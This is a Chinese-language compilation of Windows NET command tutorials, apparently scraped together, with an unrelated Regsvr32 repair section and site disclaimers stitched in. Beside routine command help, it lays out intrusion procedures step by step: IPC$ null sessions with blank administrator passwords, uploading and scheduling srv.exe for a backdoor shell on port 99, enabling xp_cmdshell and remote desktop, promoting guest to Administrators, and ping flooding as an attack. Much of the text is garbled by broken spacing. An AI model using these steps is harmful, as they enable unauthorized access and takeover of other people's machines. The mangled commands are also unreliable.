cmd命令 DOS命令之 net use命令详解
DOS下NET命令的详细使用

DOS下NET命令的详细使用
NET命令是用于在DOS操作系统中管理网络和本机的命令程序。
它提供对网络所必需的服务和设置,如账户管理,共享文件以及网络资源的操作等。
NET命令的用法很简单,只要在命令提示符下输入“net”加上命令参数即可。
总之,NET命令是管理网络的有力工具。
一、NETUSER命令
NETUSER命令可以用来管理用户账号,常用参数有:
1、添加用户账号:net user 用户名密码 /ADD
2、删除用户账号:net user 用户名 /DEL
3、锁定用户账号:net user 用户名 /ACTIVE:NO
4、设置用户账号的密码:net user 用户名密码 /CHANGE
5、修改用户权限:net user 用户名 /GRANT:R
6、查看用户账号信息:net user 用户名
二、NETSHARE命令
NETSHARE命令可以用来管理共享文件,常用参数有:
1、添加文件共享:net share 共享文件名=目录名
2、删除文件共享:net share 共享文件名 /DELETE
3、控制共享文件访问权限:net share 共享文件名 /GRANT:R
4、查看共享文件信息:net share
三、NETSTART命令
NETSTART命令可以用来管理服务的启动和停止,常用参数有:
1、启动服务:net start 服务名
2、停止服务:net stop 服务名
3、查看已安装服务:net start
四、NETTIME命令
NETTIME命令可以用来查看和设置系统时间,常用参数有:。
NET USE 命令用法

NET USE 命令用法NET USE 命令用法net use 列出本机网络连接net use \\IP\ipc$ "密码" /user:"帐号" 建立与指定IP的 IPC$(空连接)net use z: \\IP\c$ "密码" /user:"帐号" 将对方的c 盘映射 为自己的z盘net use \\IP\ipc$ /del 删除与指定IP的IPC$连接net use z: /del 删除本机映射的z盘net use * /del 删除本机所有映射和IPC$连接如提示:提供的凭据与已存在的凭据冲突, net use * /del 即可Net use将计算机连接到某个共享资源或与其断开连接,或者显示有关计算机连接的信息。
该命令还控制永 久性网络连接。
在没有参数的情况下使用,net use 可以检索网络连接列表。
语法net use [{DeviceName | *}] [{\\ComputerName[\Share Name[\Volume]]] |[http://ComputerName/ShareName[/Folder]}] [{Password | *}]] [/userscreen.width-300)this.width=sc reen.width-300'>DomainName\]UserName] [/userscreen.width-3 00)this.width=screen.width-300'>DottedDomainName\]UserName][/userscreen.width-300)this.width=screen.width-300'>UserN ame@DottedDomainName] [/savecred] [/smartcard] [{/delete | /persistent:{yes | no}}]net use [DeviceName [/home[{Password | *}] [/dele te:{yes | no}]]net use [/persistent:{yes | no}]参数DeviceName指派名称以连接到资源,或指定要断开连接的设备。
必须掌握的网络八个CMD DOS命令

必须掌握的网络八个CMD --DOS命令一,ping它是用来检查网络是否通畅或者网络连接速度的命令。
作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的*作系统等。
下面就来看看它的一些常用的*作。
先看看帮助吧,在DOS窗口中键入:ping/? 回车,。
所示的帮助画面。
在此,我们只掌握一些基本的很有用的参数就可以了(下同)。
-t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。
试想,如果你使用100M 的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。
-l 定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。
结合上面介绍的-t参数一起使用,会有更好的效果哦。
-n 定义向目标IP发送数据包的次数,默认为3次。
如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。
说明一下,如果-t 参数和-n参数一起使用,ping命令就以放在后面的参数为标准,比如"ping IP -t -n 3",虽然使用了-t参数,但并不是一直ping下去,而是只ping 3次。
另外,ping命令不一定非得ping IP,也可以直接ping主机域名,这样就可以得到主机的IP。
从TTL的返回值可以初步判断被ping主机的*作系统,之所以说"初步判断"是因为这个值是可以修改的。
这里TTL=32表示*作系统可能是win98。
(小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix)至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对别人进行ping攻击……这些就靠大家自己发挥了。
DOS下NET命令的详细使用

share"以mylove为共享名共享C:\temp
(2)net share mylove /delete停止共享mylove目录
(11)Net Session
作 用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net
(2)/domain[:name]指定要与其时间同步的域。
(3)/set使本计算机时钟与指定计算机或域的时钟同步。
下面的这4个参数是相关的,所以一起介绍
(5)Net Start
作 用:启动服务,或显示已启动服务的列表。
命令格式:net start service
(6)Net Pause
参数介绍:(1)键入不带参数的net
statistics列出其统计信息可用的运行服务。
(2)workstation显示本地工作站服务的统计信息。
(3)server显示本地服务器服务的统计信息。
简单事例:(1)net statistics server | more显示服务器服务的统计信息
(2)sharename打印队列名称。
(3)job#在打印机队列中分配给打印作业的标识号。
(4)/hold使用 job# 时,在打印机队列中使打印作业等待。
(5)/release释放保留的打印作业。
/user指定进行连接的另外一个用户。
domainname指定另一个域。
username指定登录的用户名。
/home将用户连接到其宿主目录。
/delete取消指定网络连接。
/persistent控制永久网络连接的使用。
netuser命令详解

netuser命令详解net user用于增加/创建/改动用户帐户语法:net user [password or *] [/add] [options] [/domain]net user <="" p="">username 帐号名password 分配或改变密码* 密码提示/domain 在一个域中执行/add 创建一个帐号/delete 删除一个帐户/active:[yes or no] 激活或停止一个帐号/comment:"" 加入描述性说明/counterycode.nnn nnn 是系统编码. 0为系统缺省值/expires: 帐号到期时间.格式:月,日,年或日,月,年(格式由国家代码决定)/fullname:"" 帐号全名/homedir: 用户主目录路径/passwordchg:[yes or no] 设置用户能否更改密码/passwordreq:[yes or no] 设置用户是否需要密码/profilepath: 设置环境文件路径/scriptpath: 登录脚本路径/times: 用户可以登录的小时数/usercomment:"" 帐号说明信息/workstations: 允许登录的用户名. * 表示所有用户.管理本地组的,其实还有一个命令net group,不过是管理domain的,了解了net localgroup 也就了解了net group常用的例子:1 添加一个用户到一个组net localgroup administrators 123 /add 把123 添加到administrators组2从一个组删除一个用户net localgroup administrators 123 /delete3 net localgroup 列出本地所有用户组4 net localgroup administrators 列出特定组的用户NET LOCALGROUP[groupname [/COMMENT:"text"]] [/DOMAIN]groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname name [...] {/ADD | /DELETE} [/DOMAIN]NET LOCALGROUP 用于修改计算机上的本地组。
DOS命令netuse详解

net sh are a bc$=c:\将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录)netshare c$ /del 禁止C$共享ne t use z: \\*.*.*.*\C$把*.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘netuse c: /de l删除映射的c盘net use* /de l /y删除全部net star t显示本地主机当前服务net s tarttelne t启动 Teln et 服务net star t Ser ver 启动 Se rver服务 (I PC$ 和共享要*这个服务)netstopMesse nger停止信使服务(不会在有烦人的Win的弹出广告了)!ne t sto p ser ver 停止Ser ver 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) n et us er得到本地主机的用户列表net user gues t /ac tive:yes 将停用的g uest帐号激活(变为可用)netuserguest 888888把 Gues t 帐号的密码改为888888ne t loc algro up Ad minis trato rs gu est /add 把 Gue st 加到Admin istra tors组中(这样你就有了超级权限了)netview\\*.*.*.*查看指定IP主机上的共享nbtst at -A *.*.*.* 得到远程主机的Net BIOS用户名列表netshare查看本地主机的共享资源(本地的默认共享也可以看到)n et us e \\*.*.*.*\ipc$ ""/user:"" 建立空连接tel net *.*.*.* 90连接对方机子的te lnet,端口为90ipc onfig查看本机的IP信息入侵ipc过程序命令--------------------------------------------------------ne t use \\*.*.*.*\ipc$ "" /user:"Admi nistr ator"建立用户名为A dmini strat or 密码为空的连接co py se rver1.exe\\*.*.*.*\Admin$\sys tem32即将当前目录下的Serve r1.ex e复制到对方Admi n$共享的Syste m32目录内n et ti me \\*.*.*.*查看远程主机的当前时间at \\*.*.*.* 14:00 ser ver1.exe 在对方机子添加一个在 14:00 运行serve r1.ex e 的任务-------------------------------------------------------3389DOS开启-------------------------------------------------------e cho [Compo nents] > c:\sqlec ho TS Enabl e = o n >>c:\sq ls ysocm gr /i:c:\w innt\inf\s ysoc.inf /u:c:\sql /q--------- C:\>d ir c:\syso c.inf /s 检查INF文件的位置C:\> di r c:\sysoc mgr.* /s 检查组件安装程序-------------------------------------------------------qu ery u ser 查看正在使用的用户log off u ser 踢掉正在使用帐号的I D(这里的ID不是你的帐号)-------------------------------------------------------删除Radm in服务r_s erver.exe/stopr_serve r /un insta ll /s ilenc e-------------------------------------------------------开启cm dshel l的SQL语句E XECsp_adde xtend edpro c xp_cmdsh ell ,@dlln ame ='xplo g70.d ll' 判断存储扩展是否存在Sel ect c ount(*) fr om ma ster.dbo.s ysobj ectswhere xtyp e='X' andname='xp_c mdshe ll' 返回结果为1就OK恢复xp_cmds hellExec mast er.db o.add exten dedpr oc 'x p_cmd shell','xp log70.dll';sele ct co unt(*) fro mmas ter.d bo.sy sobje cts w herextype='X'and n ame='xp_cm dshel l'返回结果为1就OK 否则上传x plog7.0.dl lEx ec ma ster.dbo.a ddext ended proc'xp_c mdshe ll','C:\Wi nNt\S ystem32\xp log70.dll'堵上c mdshe ll的SQ L语句sp_dr opext ended proc"xp_c mdshe ll" Selec t cou nt(*) from mast er.db o.sys objec ts wh ere x type='X' a nd na me='x p_cmd shell'ne t use命令的使用2006-07-31 07:481、建立IPC$、admi n$连接:net u se \\计算机名或IP\ip c$ (输入admin istra tor与passw ord)2查看连接共享:ne t sha re3、映射共享到本地:ne t u** *:\\计算机或IP\共享名称如:netu** *: \\p c1\c$ netuse \\ip\i pc$ "密码" /user:"用户名" 建立I PC非空链接ne t use h: \\ip\c$ "密码" /us er:"用户名" 直接登陆后映射对方C:到本地为H:net useh: \\ip\c$登陆后映射对方C:到本地为H:net use\\ip\ipc$/del删除IPC链接n et us e h:/del删除映射对方到本地的为H:的映射ne t use r 用户名密码/add 建立用户net u ser g uest/acti ve:ye s 激活g uest用户ne t use r 查看有哪些用户netuser帐户名查看帐户的属性ne t loc algro up ad minis trato rs 用户名 /ad d 把“用户”添加到管理员中使其具有管理员权限,注意:adm inist rator后加s用复数ne t sta rt 查看开启了哪些服务n et st art 服务名开启服务;(如:net star t tel net,net s tartsched ule)net s top 服务名停止某服务net t ime \\目标ip查看对方时间n et ti me \\目标ip/set设置本地计算机时间与“目标IP”主机的时间同步,加上参数/y es 可取消确认信息netview查看本地局域网内开启了哪些共享net view \\ip查看对方局域网内开启了哪些共享ne t con fig 显示系统网络设置n et lo goff断开连接的共享n et pa use 服务名暂停某服务net s end i p "文本信息" 向对方发信息edi t 打开某文件ne t ver局域网内正在使用的网络连接类型和信息netshare查看本地开启的共享net shar e ipc$ 开启i pc$共享net shar e ipc$ /de l 删除i pc$共享net shar e c$/del删除C:共享ne t use r gue st 12345 用guest用户登陆后用将密码改为12345net pass word密码更改系统登陆密码ne tstat -a 查看开启了哪些端口,常用nets tat -anne tstat -n 查看端口的网络连接情况,常用ne tstat -annetst at -v查看正在进行的工作net stat-p 协议名例:n etsta t -ptcq/i p 查看某协议使用情况(查看t cp/ip协议使用情况)n etsta t -s查看正在使用的所有协议使用情况nbt sta*-* **对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tr acert -参数ip(或计算机名)跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
充分挖掘“Net Use”命令

充分挖掘“Net Use”命令一个实现驱动器映射的命令行工具作者/Mark Minasi 译者/黄思维“Net Use”是一个常用的命令行工具,本文深入挖掘了“Net Use”命令不为人知的一些用途。
最近,在本栏目的一系列文章中,我讨论了Windows Server 2003和Windows XP的一些内置的网络命令行工具。
这次,我要讨论的是大家都不陌生的一个Net 命令:Net Use。
你或许认为自己对“Net Use”命令再熟悉不过了,但是我敢打赌,下文提到的一些用法肯定会让你大吃一惊。
命令增强“Net Use”命令的基本功能是让你的电脑通过一个驱动器盘符登录到一台给定的文件服务器上,并且授予特定共享资源的访问权限。
比如:net use N: \\myserver\stuff这条命令告诉你的电脑去连接一台名叫“myserver”的服务器,并授予你访问这台服务器上名叫“\stuff”的共享资源的权限,同时,创建一个虚拟的驱动器N,通过它来访问共享资源的数据。
现在,让我们以同样的例子,通过三项命令增强来深入挖掘“Net Use”命令的用途。
首先,除了基本的主机名(例如:myserver)外,“Net Use”还允许你用其它方式来指定文件服务器的名称。
你可以使用完全限定域名,比如:,或者直接用IP地址,如:10.50.50.66。
其次,你可以不指定驱动器盘符,如果你仅键入一个星号(*),那么“Net Use”将为你自动选择一个尚未分配的盘符。
第三,你可以让“Net Use”只连接到共享资源里的某一个目录,而不是整个共享资源。
举个例子,假设你的主文件夹位于“myserver”服务器的“\homedirs”共享资源的“\georgehome”目录里,你可以通过下述命令来把驱动器H映射到“\georgehome”目录:Net use H: \\myserver\homedirs\georgehome如此,打开H盘后,你只能看到自己的文件夹里的内容,而不是所有用户的主文件夹列表。
net use命令详解

Regsvr32命令修復系統故障Regsvr32命令是Windows 系統提供的一個實用工具,它用來向系統註冊控制項或者卸載控制項,利用該命令,可找回系統丟失的功能。
Regsvr32命令以命令行方式運行,其命令格式為:Regsvr32 [/u] Filename, Filename是控制項檔案名,不帶參數u 就是註冊控制項,帶參數u 就是卸載控制項。
l. 恢復圖片預覽功能:Windows XP的圖片預覽功能,對應的控制項檔為thurnbvw.dll。
如果該功能損壞,可單擊“開始”一“運行”, 在“打開”框中輸人:" Regsvr32 Thurnbvw. dll" ,單擊“確定”執行命令,這時就會彈出提示框:" DllRegisterServer in Thumbvw.dll succeeded." ,這表明控制項註冊成功。
重新啟動電腦,WindowsXP 的圖片預覽功能便恢復了。
2. 恢復ZIP功能:Windows XP 系統提供了ZIP功能,雖然功能不算強大,但不需要第三方軟體就可打開ZIP檔,而且可以把ZIP壓縮檔當作檔夾使用,也算是比較方便、實用的功能。
如果該功能損壞,可在運行框中執行“Regsvr32 ZIPfldr.dll”命令,然後重新啟動電腦即可恢復。
3. 恢復IE新視窗打開超連結功能:在IE中有兩種超連結,一種是在當前頁面跳轉的鏈結,另一種是彈出新視窗的鏈結,對第一種鏈結也可按住Shift鍵在新視窗中打開。
很多人都遇到過不能在新視窗打開鏈結的麻煩事兒,這個問題也是因控制項註冊資訊丟失引起的。
解決辦法是:在運行框中分別執行三個命令:“Regsvr32 Actxprxy.dll ”、“Regsvr32 Shdocvw.dll”、" Regsvr32 Oleaut32.dll ”。
一這三個控制項註冊成功後,重新啟動電腦,IE 就恢復正常了。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
DOS命令之net use命令详细解释net use ipipc$ " " /user:" " 建立IPC空链接net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:net use h: ipc$ 登陆后映射对方C:到本地为H:net use ipipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务;(如:net start telnet, net start schedule)net stop 服务名停止某服务net time 目标ip 查看对方时间net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C:共享net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况,常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping 就成了死亡之ping)ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA 分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A 表示删除除只读、隐藏、系统、存档以外的文件。
例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件>net use H: \\192.168.1.20\downloads /user:admin p@ssword net use * /d评论 # re: DOS命令之net use命令详细解释 2009-06-05 08:20 蜘蛛1)建立空连接:net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)2)建立非空连接:net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格)3)映射默认共享:net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$4)删除一个ipc$连接net use \\IP\ipc$ /del5)删除共享映射net use c: /del 删除映射的c盘,其他盘类推net use * /del 删除全部,会有提示要求按y确认3 查看远程主机的共享资源(但看不到默认共享)net view \\IP4 查看本地主机的共享资源(可以看到本地的默认共享)net share5 得到远程主机的用户名列表nbtstat -A IP6 得到本地主机的用户列表net user7 查看远程主机的当前时间net time \\IP8 显示本地主机当前服务net start9 启动/关闭本地服务net start 服务名 /ynet stop 服务名 /y10 映射远程共享:net use z: \\IP\baby此命令将共享名为baby的共享资源映射到z盘11 删除共享映射net use c: /del 删除映射的c盘,其他盘类推net use * /del /y删除全部12 向远程主机复制文件copy \路径\srv.exe \\IP\共享目录名,如:copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内13 远程添加计划任务at \\ip 时间程序名,如:at \\127.0.0.0 11:00 love.exe注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径14 开启远程主机的telnet这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:1)目标开启了ipc$共享2)你要拥有管理员密码和帐号3)目标开启RemoteRegistry服务,用户就该ntlm认证4)对WIN2K/XP有效,NT未经测试命令格式:OpenTelnet.exe \\server account psw NTLM认证方式port试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 9015 激活用户/加入管理员组1 net uesr account /active:yes2 net localgroup administrators account /add16 关闭远程主机的telnet同样需要一个小程序:ResumeTelnet.exe命令格式:ResumeTelnet.exe \\server account psw试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""17 删除一个已建立的ipc$连接net use \\IP\ipc$ /del九经典入侵模式这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是administrators,密码为"空"的IP 地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
复制之前务必用net view \\IP这个命令看一下对方的共享情况2. C:\>copy srv.exe \\127.0.0.1\admin$先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin 用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)5. C:\>net time \\127.0.0.1再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99这里会用到Telnet命令吧,注意端口是99。
Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了7.C:\>copy ntlm.exe \\127.0.0.1\admin$用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。